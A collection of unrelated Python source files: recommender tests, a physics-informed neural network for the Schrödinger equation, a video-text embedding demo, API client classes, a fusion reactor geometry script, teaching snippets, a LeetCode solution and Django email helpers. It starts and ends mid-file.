cd = als.BiasedMF(20, iterations=20, reg=(2, 0.001), method='cd', rng_spec=42)
ratings = lktu.ml_test.ratings
timer = Stopwatch()
lu.fit(ratings)
timer.stop()
_log.info('fit with LU solver in %s', timer)
timer = Stopwatch()
cd.fit(ratings)
timer.stop()
_log.info('fit with CD solver in %s', timer)
assert lu.bias.mean_ == approx(ratings.rating.mean())
assert cd.bias.mean_ == approx(ratings.rating.mean())
preds = []
rng = util.rng(42, legacy=True)
for u in rng.choice(np.unique(ratings.user), 15, replace=False):
items = rng.choice(np.unique(ratings.item), 15, replace=False)
lu_preds = lu.predict_for_user(u, items)
cd_preds = cd.predict_for_user(u, items)
diff = lu_preds - cd_preds
adiff = np.abs(diff)
_log.info('user %s diffs: L2 = %f, min = %f, med = %f, max = %f, 90%% = %f', u,
np.linalg.norm(diff, 2),
np.min(adiff), np.median(adiff), np.max(adiff), np.quantile(adiff, 0.9))
preds.append(pd.DataFrame({
'user': u,
'item': items,
'lu': lu_preds,
'cd': cd_preds,
'adiff': adiff
}))
preds = pd.concat(preds, ignore_index=True)
_log.info('LU preds:\n%s', preds.lu.describe())
_log.info('CD preds:\n%s', preds.cd.describe())
_log.info('overall differences:\n%s', preds.adiff.describe())
# there are differences. our check: the 90% are under a quarter star
assert np.quantile(adiff, 0.9) <= 0.27
@mark.slow
@mark.eval
@mark.skipif(not lktu.ml100k.available, reason='ML100K data not present')
def test_als_batch_accuracy():
from lenskit.algorithms import bias
import lenskit.crossfold as xf
import lenskit.metrics.predict as pm
ratings = lktu.ml100k.ratings
lu_algo = als.BiasedMF(25, iterations=20, damping=5, method='lu')
cd_algo = als.BiasedMF(25, iterations=25, damping=5, method='cd')
# algo = bias.Fallback(svd_algo, bias.Bias(damping=5))
def eval(train, test):
_log.info('training LU')
lu_algo.fit(train)
_log.info('training CD')
cd_algo.fit(train)
_log.info('testing %d users', test.user.nunique())
return test.assign(lu_pred=lu_algo.predict(test), cd_pred=cd_algo.predict(test))
folds = xf.partition_users(ratings, 5, xf.SampleFrac(0.2))
preds = pd.concat(eval(train, test) for (train, test) in folds)
preds['abs_diff'] = np.abs(preds.lu_pred - preds.cd_pred)
_log.info('predictions:\n%s', preds.sort_values('abs_diff', ascending=False))
_log.info('diff summary:\n%s', preds.abs_diff.describe())
lu_mae = pm.mae(preds.lu_pred, preds.rating)
assert lu_mae == approx(0.73, abs=0.045)
cd_mae = pm.mae(preds.cd_pred, preds.rating)
assert cd_mae == approx(0.73, abs=0.045)
user_rmse = preds.groupby('user').apply(lambda df: pm.rmse(df.lu_pred, df.rating))
assert user_rmse.mean() == approx(0.94, abs=0.05)
user_rmse = preds.groupby('user').apply(lambda df: pm.rmse(df.cd_pred, df.rating))
assert user_rmse.mean() == approx(0.94, abs=0.05)
|
"""
@author: Maziar Raissi
"""
import sys
sys.path.insert(0, "../../Utilities/")
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import scipy.io
from scipy.interpolate import griddata
from pyDOE import lhs
from plotting import newfig, savefig
from mpl_toolkits.mplot3d import Axes3D
import time
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1 import make_axes_locatable
np.random.seed(1234)
tf.set_random_seed(1234)
class PhysicsInformedNN:
# Initialize the class
def __init__(self, x0, u0, v0, tb, X_f, layers, lb, ub):
X0 = np.concatenate((x0, 0 * x0), 1) # (x0, 0)
X_lb = np.concatenate((0 * tb + lb[0], tb), 1) # (lb[0], tb)
X_ub = np.concatenate((0 * tb + ub[0], tb), 1) # (ub[0], tb)
self.lb = lb
self.ub = ub
self.x0 = X0[:, 0:1]
self.t0 = X0[:, 1:2]
self.x_lb = X_lb[:, 0:1]
self.t_lb = X_lb[:, 1:2]
self.x_ub = X_ub[:, 0:1]
self.t_ub = X_ub[:, 1:2]
self.x_f = X_f[:, 0:1]
self.t_f = X_f[:, 1:2]
self.u0 = u0
self.v0 = v0
# Initialize NNs
self.layers = layers
self.weights, self.biases = self.initialize_NN(layers)
# tf Placeholders
self.x0_tf = tf.placeholder(tf.float32, shape=[None, self.x0.shape[1]])
self.t0_tf = tf.placeholder(tf.float32, shape=[None, self.t0.shape[1]])
self.u0_tf = tf.placeholder(tf.float32, shape=[None, self.u0.shape[1]])
self.v0_tf = tf.placeholder(tf.float32, shape=[None, self.v0.shape[1]])
self.x_lb_tf = tf.placeholder(tf.float32, shape=[None, self.x_lb.shape[1]])
self.t_lb_tf = tf.placeholder(tf.float32, shape=[None, self.t_lb.shape[1]])
self.x_ub_tf = tf.placeholder(tf.float32, shape=[None, self.x_ub.shape[1]])
self.t_ub_tf = tf.placeholder(tf.float32, shape=[None, self.t_ub.shape[1]])
self.x_f_tf = tf.placeholder(tf.float32, shape=[None, self.x_f.shape[1]])
self.t_f_tf = tf.placeholder(tf.float32, shape=[None, self.t_f.shape[1]])
# tf Graphs
self.u0_pred, self.v0_pred, _, _ = self.net_uv(self.x0_tf, self.t0_tf)
(
self.u_lb_pred,
self.v_lb_pred,
self.u_x_lb_pred,
self.v_x_lb_pred,
) = self.net_uv(self.x_lb_tf, self.t_lb_tf)
(
self.u_ub_pred,
self.v_ub_pred,
self.u_x_ub_pred,
self.v_x_ub_pred,
) = self.net_uv(self.x_ub_tf, self.t_ub_tf)
self.f_u_pred, self.f_v_pred = self.net_f_uv(self.x_f_tf, self.t_f_tf)
# Loss
self.loss = (
tf.reduce_mean(tf.square(self.u0_tf - self.u0_pred))
+ tf.reduce_mean(tf.square(self.v0_tf - self.v0_pred))
+ tf.reduce_mean(tf.square(self.u_lb_pred - self.u_ub_pred))
+ tf.reduce_mean(tf.square(self.v_lb_pred - self.v_ub_pred))
+ tf.reduce_mean(tf.square(self.u_x_lb_pred - self.u_x_ub_pred))
+ tf.reduce_mean(tf.square(self.v_x_lb_pred - self.v_x_ub_pred))
+ tf.reduce_mean(tf.square(self.f_u_pred))
+ tf.reduce_mean(tf.square(self.f_v_pred))
)
# Optimizers
self.optimizer = tf.contrib.opt.ScipyOptimizerInterface(
self.loss,
method="L-BFGS-B",
options={
"maxiter": 50000,
"maxfun": 50000,
"maxcor": 50,
"maxls": 50,
"ftol": 1.0 * np.finfo(float).eps,
},
)
self.optimizer_Adam = tf.train.AdamOptimizer()
self.train_op_Adam = self.optimizer_Adam.minimize(self.loss)
# tf session
self.sess = tf.Session(
config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=True)
)
init = tf.global_variables_initializer()
self.sess.run(init)
def initialize_NN(self, layers):
weights = []
biases = []
num_layers = len(layers)
for l in range(0, num_layers - 1):
W = self.xavier_init(size=[layers[l], layers[l + 1]])
b = tf.Variable(
tf.zeros([1, layers[l + 1]], dtype=tf.float32), dtype=tf.float32
)
weights.append(W)
biases.append(b)
return weights, biases
def xavier_init(self, size):
in_dim = size[0]
out_dim = size[1]
xavier_stddev = np.sqrt(2 / (in_dim + out_dim))
return tf.Variable(
tf.truncated_normal([in_dim, out_dim], stddev=xavier_stddev),
dtype=tf.float32,
)
def neural_net(self, X, weights, biases):
num_layers = len(weights) + 1
H = 2.0 * (X - self.lb) / (self.ub - self.lb) - 1.0
for l in range(0, num_layers - 2):
W = weights[l]
b = biases[l]
H = tf.tanh(tf.add(tf.matmul(H, W), b))
W = weights[-1]
b = biases[-1]
Y = tf.add(tf.matmul(H, W), b)
return Y
def net_uv(self, x, t):
X = tf.concat([x, t], 1)
uv = self.neural_net(X, self.weights, self.biases)
u = uv[:, 0:1]
v = uv[:, 1:2]
u_x = tf.gradients(u, x)[0]
v_x = tf.gradients(v, x)[0]
return u, v, u_x, v_x
def net_f_uv(self, x, t):
u, v, u_x, v_x = self.net_uv(x, t)
u_t = tf.gradients(u, t)[0]
u_xx = tf.gradients(u_x, x)[0]
v_t = tf.gradients(v, t)[0]
v_xx = tf.gradients(v_x, x)[0]
f_u = u_t + 0.5 * v_xx + (u ** 2 + v ** 2) * v
f_v = v_t - 0.5 * u_xx - (u ** 2 + v ** 2) * u
return f_u, f_v
def callback(self, loss):
print("Loss:", loss)
def train(self, nIter):
tf_dict = {
self.x0_tf: self.x0,
self.t0_tf: self.t0,
self.u0_tf: self.u0,
self.v0_tf: self.v0,
self.x_lb_tf: self.x_lb,
self.t_lb_tf: self.t_lb,
self.x_ub_tf: self.x_ub,
self.t_ub_tf: self.t_ub,
self.x_f_tf: self.x_f,
self.t_f_tf: self.t_f,
}
start_time = time.time()
for it in range(nIter):
self.sess.run(self.train_op_Adam, tf_dict)
# Print
if it % 10 == 0:
elapsed = time.time() - start_time
loss_value = self.sess.run(self.loss, tf_dict)
print("It: %d, Loss: %.3e, Time: %.2f" % (it, loss_value, elapsed))
start_time = time.time()
self.optimizer.minimize(
self.sess,
feed_dict=tf_dict,
fetches=[self.loss],
loss_callback=self.callback,
)
def predict(self, X_star):
tf_dict = {self.x0_tf: X_star[:, 0:1], self.t0_tf: X_star[:, 1:2]}
u_star = self.sess.run(self.u0_pred, tf_dict)
v_star = self.sess.run(self.v0_pred, tf_dict)
tf_dict = {self.x_f_tf: X_star[:, 0:1], self.t_f_tf: X_star[:, 1:2]}
f_u_star = self.sess.run(self.f_u_pred, tf_dict)
f_v_star = self.sess.run(self.f_v_pred, tf_dict)
return u_star, v_star, f_u_star, f_v_star
if __name__ == "__main__":
noise = 0.0
# Doman bounds
lb = np.array([-5.0, 0.0])
ub = np.array([5.0, np.pi / 2])
N0 = 50
N_b = 50
N_f = 20000
layers = [2, 100, 100, 100, 100, 2]
data = scipy.io.loadmat("../Data/NLS.mat")
t = data["tt"].flatten()[:, None]
x = data["x"].flatten()[:, None]
Exact = data["uu"]
Exact_u = np.real(Exact)
Exact_v = np.imag(Exact)
Exact_h = np.sqrt(Exact_u ** 2 + Exact_v ** 2)
X, T = np.meshgrid(x, t)
X_star = np.hstack((X.flatten()[:, None], T.flatten()[:, None]))
u_star = Exact_u.T.flatten()[:, None]
v_star = Exact_v.T.flatten()[:, None]
h_star = Exact_h.T.flatten()[:, None]
###########################
idx_x = np.random.choice(x.shape[0], N0, replace=False)
x0 = x[idx_x, :]
u0 = Exact_u[idx_x, 0:1]
v0 = Exact_v[idx_x, 0:1]
idx_t = np.random.choice(t.shape[0], N_b, replace=False)
tb = t[idx_t, :]
X_f = lb + (ub - lb) * lhs(2, N_f)
model = PhysicsInformedNN(x0, u0, v0, tb, X_f, layers, lb, ub)
start_time = time.time()
model.train(50000)
elapsed = time.time() - start_time
print("Training time: %.4f" % (elapsed))
u_pred, v_pred, f_u_pred, f_v_pred = model.predict(X_star)
h_pred = np.sqrt(u_pred ** 2 + v_pred ** 2)
error_u = np.linalg.norm(u_star - u_pred, 2) / np.linalg.norm(u_star, 2)
error_v = np.linalg.norm(v_star - v_pred, 2) / np.linalg.norm(v_star, 2)
error_h = np.linalg.norm(h_star - h_pred, 2) / np.linalg.norm(h_star, 2)
print("Error u: %e" % (error_u))
print("Error v: %e" % (error_v))
print("Error h: %e" % (error_h))
U_pred = griddata(X_star, u_pred.flatten(), (X, T), method="cubic")
V_pred = griddata(X_star, v_pred.flatten(), (X, T), method="cubic")
H_pred = griddata(X_star, h_pred.flatten(), (X, T), method="cubic")
FU_pred = griddata(X_star, f_u_pred.flatten(), (X, T), method="cubic")
FV_pred = griddata(X_star, f_v_pred.flatten(), (X, T), method="cubic")
######################################################################
############################# Plotting ###############################
######################################################################
X0 = np.concatenate((x0, 0 * x0), 1) # (x0, 0)
X_lb = np.concatenate((0 * tb + lb[0], tb), 1) # (lb[0], tb)
X_ub = np.concatenate((0 * tb + ub[0], tb), 1) # (ub[0], tb)
X_u_train = np.vstack([X0, X_lb, X_ub])
fig, ax = newfig(1.0, 0.9)
ax.axis("off")
####### Row 0: h(t,x) ##################
gs0 = gridspec.GridSpec(1, 2)
gs0.update(top=1 - 0.06, bottom=1 - 1 / 3, left=0.15, right=0.85, wspace=0)
ax = plt.subplot(gs0[:, :])
h = ax.imshow(
H_pred.T,
interpolation="nearest",
cmap="YlGnBu",
extent=[lb[1], ub[1], lb[0], ub[0]],
origin="lower",
aspect="auto",
)
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
fig.colorbar(h, cax=cax)
ax.plot(
X_u_train[:, 1],
X_u_train[:, 0],
"kx",
label="Data (%d points)" % (X_u_train.shape[0]),
markersize=4,
clip_on=False,
)
line = np.linspace(x.min(), x.max(), 2)[:, None]
ax.plot(t[75] * np.ones((2, 1)), line, "k--", linewidth=1)
ax.plot(t[100] * np.ones((2, 1)), line, "k--", linewidth=1)
ax.plot(t[125] * np.ones((2, 1)), line, "k--", linewidth=1)
ax.set_xlabel("$t$")
ax.set_ylabel("$x$")
leg = ax.legend(frameon=False, loc="best")
# plt.setp(leg.get_texts(), color='w')
ax.set_title("$|h(t,x)|$", fontsize=10)
####### Row 1: h(t,x) slices ##################
gs1 = gridspec.GridSpec(1, 3)
gs1.update(top=1 - 1 / 3, bottom=0, left=0.1, right=0.9, wspace=0.5)
ax = plt.subplot(gs1[0, 0])
ax.plot(x, Exact_h[:, 75], "b-", linewidth=2, label="Exact")
ax.plot(x, H_pred[75, :], "r--", linewidth=2, label="Prediction")
ax.set_xlabel("$x$")
ax.set_ylabel("$|h(t,x)|$")
ax.set_title("$t = %.2f$" % (t[75]), fontsize=10)
ax.axis("square")
ax.set_xlim([-5.1, 5.1])
ax.set_ylim([-0.1, 5.1])
ax = plt.subplot(gs1[0, 1])
ax.plot(x, Exact_h[:, 100], "b-", linewidth=2, label="Exact")
ax.plot(x, H_pred[100, :], "r--", linewidth=2, label="Prediction")
ax.set_xlabel("$x$")
ax.set_ylabel("$|h(t,x)|$")
ax.axis("square")
ax.set_xlim([-5.1, 5.1])
ax.set_ylim([-0.1, 5.1])
ax.set_title("$t = %.2f$" % (t[100]), fontsize=10)
ax.legend(loc="upper center", bbox_to_anchor=(0.5, -0.8), ncol=5, frameon=False)
ax = plt.subplot(gs1[0, 2])
ax.plot(x, Exact_h[:, 125], "b-", linewidth=2, label="Exact")
ax.plot(x, H_pred[125, :], "r--", linewidth=2, label="Prediction")
ax.set_xlabel("$x$")
ax.set_ylabel("$|h(t,x)|$")
ax.axis("square")
ax.set_xlim([-5.1, 5.1])
ax.set_ylim([-0.1, 5.1])
ax.set_title("$t = %.2f$" % (t[125]), fontsize=10)
# savefig('./figures/NLS')
|
import math
import os
import uuid
import cv2
import numpy as np
import tensorflow as tf
import tensorflow_hub as tfhub
from tensorflow.keras.utils import get_file
def produce_embeddings(model, input_frames, input_words):
frames = tf.cast(input_frames, dtype=tf.float32)
frames = tf.constant(frames)
video_model = model.signatures['video']
video_embedding = video_model(frames)
video_embedding = video_embedding['video_embedding']
words = tf.constant(input_words)
text_model = model.signatures['text']
text_embedding = text_model(words)
text_embedding = text_embedding['text_embedding']
return video_embedding, text_embedding
def crop_center(frame):
height, width = frame.shape[:2]
smallest_dimension = min(width, height)
x_start = (width // 2) - (smallest_dimension // 2)
x_end = x_start + smallest_dimension
y_start = (height // 2) - (smallest_dimension // 2)
y_end = y_start + smallest_dimension
roi = frame[y_start:y_end, x_start:x_end]
return roi
def fetch_and_read_video(video_url,
max_frames=32,
resize=(224, 224)):
extension = video_url.rsplit(os.path.sep,
maxsplit=1)[-1]
path = get_file(f'{str(uuid.uuid4())}.{extension}',
video_url,
cache_dir='.',
cache_subdir='.')
capture = cv2.VideoCapture(path)
frames = []
while len(frames) <= max_frames:
frame_read, frame = capture.read()
if not frame_read:
break
frame = crop_center(frame)
frame = cv2.resize(frame, resize)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frames.append(frame)
capture.release()
frames = np.array(frames)
if len(frames) < max_frames:
repetitions = math.ceil(
float(max_frames) / len(frames))
repetitions = int(repetitions)
frames = frames.repeat(repetitions, axis=0)
frames = frames[:max_frames]
return frames / 255.0
URLS = [
('https://media.giphy.com/media/'
'WWYSFIZo4fsLC/source.gif'),
('https://media.giphy.com/media/'
'fwhIy2QQtu5vObfjrs/source.gif'),
('https://media.giphy.com/media/'
'W307DdkjIsRHVWvoFE/source.gif'),
('https://media.giphy.com/media/'
'FOcbaDiNEaqqY/source.gif'),
('https://media.giphy.com/media/'
'VJwck53yG6y8s2H3Og/source.gif')]
VIDEOS = [fetch_and_read_video(url) for url in URLS]
QUERIES = ['beach', 'playing drums', 'airplane taking off',
'biking', 'dog catching frisbee']
model = tfhub.load('https://tfhub.dev/deepmind/mil-nce/s3d/1')
video_emb, text_emb = produce_embeddings(model,
np.stack(VIDEOS,
axis=0),
np.array(QUERIES))
scores = np.dot(text_emb, tf.transpose(video_emb))
first_frames = [v[0] for v in VIDEOS]
first_frames = [cv2.cvtColor((f * 255.0).astype('uint8'),
cv2.COLOR_RGB2BGR) for f in
first_frames]
for query, video, query_scores in zip(QUERIES, VIDEOS, scores):
sorted_results = sorted(list(zip(QUERIES,
first_frames,
query_scores)),
key=lambda p: p[-1],
reverse=True)
annotated_frames = []
for i, (q, f, s) in enumerate(sorted_results, start=1):
frame = f.copy()
cv2.putText(frame,
f'#{i} - Score: {s:.2f}',
(8, 15),
fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=0.6,
color=(0, 0, 255),
thickness=2)
annotated_frames.append(frame)
cv2.imshow(f'Results for query "{query}"',
np.hstack(annotated_frames))
cv2.waitKey(0)
|
from __future__ import absolute_import, division, print_function, unicode_literals
from six import python_2_unicode_compatible
from canvasapi.bookmark import Bookmark
from canvasapi.paginated_list import PaginatedList
from canvasapi.user import User
from canvasapi.util import combine_kwargs, obj_or_id
@python_2_unicode_compatible
class CurrentUser(User):
def __init__(self, _requester):
self._requester = _requester
response = self._requester.request(
'GET',
'users/self'
)
super(CurrentUser, self).__init__(self._requester, response.json())
def __str__(self):
return "{} ({})".format(self.name, self.id)
def list_groups(self, **kwargs):
"""
Return the list of active groups for the user.
:calls: `GET /api/v1/users/self/groups \
<https://canvas.instructure.com/doc/api/groups.html#method.groups.index>`_
:rtype: :class:`canvasapi.paginated_list.PaginatedList` of :class:`canvasapi.group.Group`
"""
from canvasapi.group import Group
return PaginatedList(
Group,
self._requester,
'GET',
'users/self/groups',
_kwargs=combine_kwargs(**kwargs)
)
def list_bookmarks(self, **kwargs):
"""
List bookmarks that the current user can view or manage.
:calls: `GET /api/v1/users/self/bookmarks \
<https://canvas.instructure.com/doc/api/bookmarks.html#method.bookmarks/bookmarks.index>`_
:rtype: :class:`canvasapi.paginated_list.PaginatedList` of
:class:`canvasapi.bookmark.Bookmark`
"""
return PaginatedList(
Bookmark,
self._requester,
'GET',
'users/self/bookmarks'
)
def create_bookmark(self, name, url, **kwargs):
"""
Create a new Bookmark.
:calls: `POST /api/v1/users/self/bookmarks \
<https://canvas.instructure.com/doc/api/bookmarks.html#method.bookmarks/bookmarks.create>`_
:param name: The name of the bookmark.
:type name: `str`
:param url: The url of the bookmark.
:type url: `str`
:rtype: :class:`canvasapi.bookmark.Bookmark`
"""
from canvasapi.bookmark import Bookmark
response = self._requester.request(
'POST',
'users/self/bookmarks',
name=name,
url=url,
_kwargs=combine_kwargs(**kwargs)
)
return Bookmark(self._requester, response.json())
def get_bookmark(self, bookmark):
"""
Return single Bookmark by id
:calls: `GET /api/v1/users/self/bookmarks/:id \
<https://canvas.instructure.com/doc/api/bookmarks.html#method.bookmarks/bookmarks.show>`_
:param bookmark: The object or ID of the bookmark.
:type bookmark: :class:`canvasapi.bookmark.Bookmark` or int
:rtype: :class:`canvasapi.bookmark.Bookmark`
"""
from canvasapi.bookmark import Bookmark
bookmark_id = obj_or_id(bookmark, "bookmark", (Bookmark,))
response = self._requester.request(
'GET',
'users/self/bookmarks/{}'.format(bookmark_id)
)
return Bookmark(self._requester, response.json())
|
"""
This example creates a center column study reactor using a parametric reactor.
Adds some TF coils to the reactor. By default the script saves stp, stl,
html and svg files.
"""
import paramak
def make_center_column_study_reactor(
outputs=[
'stp',
'neutronics',
'svg',
'stl',
'html']):
my_reactor = paramak.CenterColumnStudyReactor(
inner_bore_radial_thickness=20,
inboard_tf_leg_radial_thickness=50,
center_column_shield_radial_thickness_mid=50,
center_column_shield_radial_thickness_upper=100,
inboard_firstwall_radial_thickness=20,
divertor_radial_thickness=100,
inner_plasma_gap_radial_thickness=80,
plasma_radial_thickness=200,
outer_plasma_gap_radial_thickness=90,
elongation=2.3,
triangularity=0.45,
plasma_gap_vertical_thickness=40,
center_column_arc_vertical_thickness=520,
rotation_angle=180)
# adding in some TF coils
tf_magnet = paramak.ToroidalFieldCoilPrincetonD(
R1=20 + 50,
R2=20 + 50 + 50 + 80 + 200 + 90 + 100 + 20,
thickness=50,
distance=50,
number_of_coils=12,
rotation_angle=180
)
my_reactor.shapes_and_components.append(tf_magnet)
if 'stp' in outputs:
my_reactor.export_stp(output_folder='CenterColumnStudyReactor')
if 'neutronics' in outputs:
my_reactor.export_neutronics_description(
'CenterColumnStudyReactor/manifest.json')
if 'svg' in outputs:
my_reactor.export_svg('CenterColumnStudyReactor/reactor.svg')
if 'stl' in outputs:
my_reactor.export_stl(output_folder='CenterColumnStudyReactor')
if 'html' in outputs:
my_reactor.export_html('CenterColumnStudyReactor/reactor.html')
if __name__ == "__main__":
make_center_column_study_reactor()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 18 14:21:09 2018
@author: Basil
"""
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 14 19:33:08 2018
@author: Basil
"""
#from numpy import *
import gc
import numpy
import time
from joblib import Parallel, delayed
def GetIntensityDependence(zs, useRunningTime = False):
intensities_z = numpy.full( (len(zs), Nall), numpy.NaN);
time.sleep(10)
return intensities_z;
Izt0yx = None;
gc.collect()
n_jobs = 2
Nall = 8000000
Nz=60;
zs_intervals = numpy.split(numpy.linspace(1, Nz, Nz), n_jobs)
Izt0yx = numpy.array(Parallel(n_jobs=n_jobs)(delayed(GetIntensityDependence)(zs, True) for zs in zs_intervals))#GetIntensityDependence(x, ts+t0, zs, True)
gc.collect()
|
# Sprobuj wykonac w shellu:
# locals()
# globals()
# import a01_funkcje
# locals()
# globals()
"""
Opis modulu
"""
a = 1
b = 2
def test1(arg1):
"""To jest pierwsza linia opisu
A to sa kolejne
I jeszcze
I jeszcze.
"""
a = arg1
print('test1: LOCALS :', locals())
print('test1: GLOBALS :', globals()['a'])
def test2(arg2):
"""Test2_doc
"""
global a
a = arg2
b = arg2 + 1
test1(b)
print('test2:LOCALS :', locals())
print('test2:GLOBALS :', globals()['a'])
print(a, b)
test1(3)
print('--------------')
test2(3)
print(a, b)
print(test1.__doc__)
print(test2.__doc__)
print(locals.__doc__)
print(globals.__doc__)
locals()['a'] = 5
print(locals()['a'], a)
print(globals()['a'])
globals()['a'] = 6
print(globals()['a'])
# print(globals()['z'])
# globals()['z'] = 6
# print(globals()['z'], z)
# nastepnie sprawdzmy wyniki
# import a01localsglobals
#
# a01localsglobals.a
# a01localsglobals.b
# a01localsglobals.test1(3)
# a01localsglobals.test2(3)
# jakie wyniki otrzymamy wywolujac
# a01localsglobals.test1.__doc__
# a01localsglobals.test2.__doc__
#
# Sprawdz
locals.__doc__
globals.__doc__
|
import numpy as np
class BayesNet(object):
'''
Define a Bayesian Network class
'''
def __init__(self):
self.nodes = None
class Node(object):
def __init__(self, table, state):
self.table = table
self.state = state
if __name__ == "__main__":
pass
|
import os
import sys
import numpy as np
import rootpath
import xml.etree.ElementTree as ET
from collections import namedtuple
try:
sys.path.append(os.path.join(rootpath.detect()))
import setup
from argU.preprocessing.texts import clean_to_nl
from argU.preprocessing.texts import clean_to_train
from argU.preprocessing.texts import clean_pos_tags
except Exception as e:
print(e)
sys.exit(0)
Query = namedtuple('Query', 'id text')
def read(directory):
"""Read queries and clean them"""
queries = []
tree = ET.parse(os.path.join(directory, 'topics.xml'))
topics = tree.getroot()
for topic in topics:
queries.append(
Query(topic[0].text, __clean(topic[1].text))
)
return queries
def __clean(q_text):
q_text = q_text.replace('?', '')
q_text = clean_to_nl(q_text)
q_text = clean_to_train(q_text)
q_text = clean_pos_tags(q_text)
return q_text
if __name__ == '__main__':
from argU.indexing.models import CBOW
from argU.indexing.models import DESM
cbow = CBOW.load()
desm = DESM(cbow)
queries = read(setup.ROOT_PATH)
print(desm.queries_to_emb(queries))
|
import sgtk
from sgtk.platform.qt import QtCore, QtGui
import cPickle
from ..ui.my_time_form import Ui_MyTimeForm
logger = sgtk.platform.get_logger(__name__)
class MyTimeTree(QtGui.QListView):
'''
a listView whose items can be moved
'''
def __init__(self, parent=None):
QtGui.QListView.__init__(self, parent)
self.setSpacing(1)
self.setStyleSheet("font-size: 12pt;")
self.setDragEnabled(True)
def dragEnterEvent(self, event):
if event.mimeData().hasFormat("application/x-timelogevent"):
event.setDropAction(QtCore.Qt.QMoveAction)
event.accept()
else:
event.ignore()
def startDrag(self, event):
index = self.indexAt(event.pos())
if not index.isValid():
return
# selected is the relevant person object
selected = self.model().data(index, QtCore.Qt.UserRole)
logger.debug("Drag data: %s" % selected)
# convert to a bytestream
bstream = cPickle.dumps(selected)
mimeData = QtCore.QMimeData()
mimeData.setData("application/x-timelogevent", bstream)
drag = QtGui.QDrag(self)
drag.setMimeData(mimeData)
# the object itself
pixmap = QtGui.QPixmap()
pixmap = pixmap.grabWidget(self, self.rectForIndex(index))
drag.setPixmap(pixmap)
drag.setHotSpot(QtCore.QPoint(pixmap.width() / 2, pixmap.height() / 2))
drag.setPixmap(pixmap)
# pixmap = QtGui.QPixmap(100, self.height()/2)
# pixmap.fill(QtGui.QColor("orange"))
# drag.setPixmap(pixmap)
result = drag.start(QtCore.Qt.MoveAction)
if result: # == QtCore.Qt.MoveAction:
self.model().removeRow(index.row())
def mouseMoveEvent(self, event):
self.startDrag(event)
class MyTimeForm(QtGui.QWidget):
'''
a listView of my time which can be moved
'''
def __init__(self, time_model, user, parent=None):
"""
Construction
:param model: The Shotgun Model this widget should connect to
:param parent: The parent QWidget for this control
"""
QtGui.QWidget.__init__(self, parent)
# set up the UI
self._ui = Ui_MyTimeForm()
self._ui.setupUi(self)
self._app = sgtk.platform.current_bundle()
self.user = user
self.time_tree = MyTimeTree(self)
self.time_tree.setModel(time_model)
self._ui.verticalLayout.addWidget(self.time_tree)
self._ui.addnew_btn.clicked.connect(self._on_addnew)
def update_ui(self):
"""
Update the UI to reflect logged in time, etc.
"""
pass
def _on_addnew(self):
pass
|
"""Leetcode 4. Median of Two Sorted Arrays
Hard
There are two sorted arrays nums1 and nums2 of size m and n respectively.
Find the median of the two sorted arrays.
The overall run time complexity should be O(log (m+n)).
You may assume nums1 and nums2 cannot be both empty.
Example 1:
nums1 = [1, 3]
nums2 = [2]
The median is 2.0
Example 2:
nums1 = [1, 2]
nums2 = [3, 4]
The median is (2 + 3)/2 = 2.5
"""
class SolutionSelect(object):
def _findKth(self, nums1, nums2, k):
# Base cases for the divide-and-conquer method.
if not nums1:
return nums2[k]
if not nums2:
return nums1[k]
i1, i2 = len(nums1) // 2, len(nums2) // 2
n1, n2 = nums1[i1], nums2[i2]
if k <= i1 + i2:
# When k is smaller than or equal to the sum of nums1 & nums2's
# middle indices.
if n1 > n2:
# When nums1's middle element is bigger than nums2's,
# the 2nd half of nums1 does not contain the kth.
return self._findKth(nums1[:i1], nums2, k)
else:
return self._findKth(nums1, nums2[:i2], k)
else:
# When k is bigger than the sum of nums1 & nums2's middle indices.
if n1 > n2:
# When nums1's middle element is bigger than nums2's,
# the 1st half of nums2 does not contain the kth.
return self._findKth(nums1, nums2[(i2 + 1):], k - i2 - 1)
else:
return self._findKth(nums1[(i1 + 1):], nums2, k - i1 - 1)
def findMedianSortedArrays(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: float
Time complexity: O(log(m + n)).
Space complexity: O(m + n).
"""
# Apply selection method. Note: starting index is 0.
l = len(nums1) + len(nums2)
if l % 2 == 1:
return self._findKth(nums1, nums2, l // 2)
else:
return (
self._findKth(nums1, nums2, l // 2 - 1)
+ self._findKth(nums1, nums2, l // 2)) / 2.0
def main():
# Ans: 2.
nums1 = [1, 3]
nums2 = [2]
print(SolutionSelect().findMedianSortedArrays(nums1, nums2))
# Ans: 2.5.
nums1 = [1, 2]
nums2 = [3, 4]
print(SolutionSelect().findMedianSortedArrays(nums1, nums2))
if __name__ == '__main__':
main()
|
# Copyright (C) 2020 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Object mapper modal."""
from lib import base
from lib.page.modal import search_modal_elements
class ObjectMapper(base.WithBrowser):
"""Object mapper modal."""
# pylint: disable=too-few-public-methods
def __init__(self):
super(ObjectMapper, self).__init__()
self._root = self._browser.element(tag_name="object-mapper")
@property
def search_filter_area(self):
return search_modal_elements.SearchFilterArea(self._root)
@property
def search_results_area(self):
return search_modal_elements.SearchResultsArea(self._root)
@property
def map_selected_btn(self):
return self._root.button(text="Map Selected")
def click_map_selected(self):
"""Clicks `Map Selected` button."""
self.map_selected_btn.click()
self._root.wait_until(lambda modal: not modal.exists)
def map_obj(self, obj):
"""Maps object."""
self.search_filter_area.search_obj(obj)
self.search_results_area.get_result_by(title=obj.title).select()
self.click_map_selected()
|
from django.core.mail import send_mail, EmailMessage, send_mass_mail, EmailMultiAlternatives
from django.template.loader import render_to_string
from django.utils.html import strip_tags
FROM_EMAIL = 'no-reply@massenergize.org'
def send_massenergize_email(subject, msg, to):
ok = send_mail(
subject,
msg,
FROM_EMAIL, #from
[to],
fail_silently=False,
)
if not ok:
print(f"Error Occurred in Sending Email to {to}")
return False
return True
def send_massenergize_rich_email(subject, to, massenergize_email_type, content_variables):
html_content = render_to_string(massenergize_email_type, content_variables)
text_content = strip_tags(html_content)
msg = EmailMultiAlternatives(subject, text_content, FROM_EMAIL, [to])
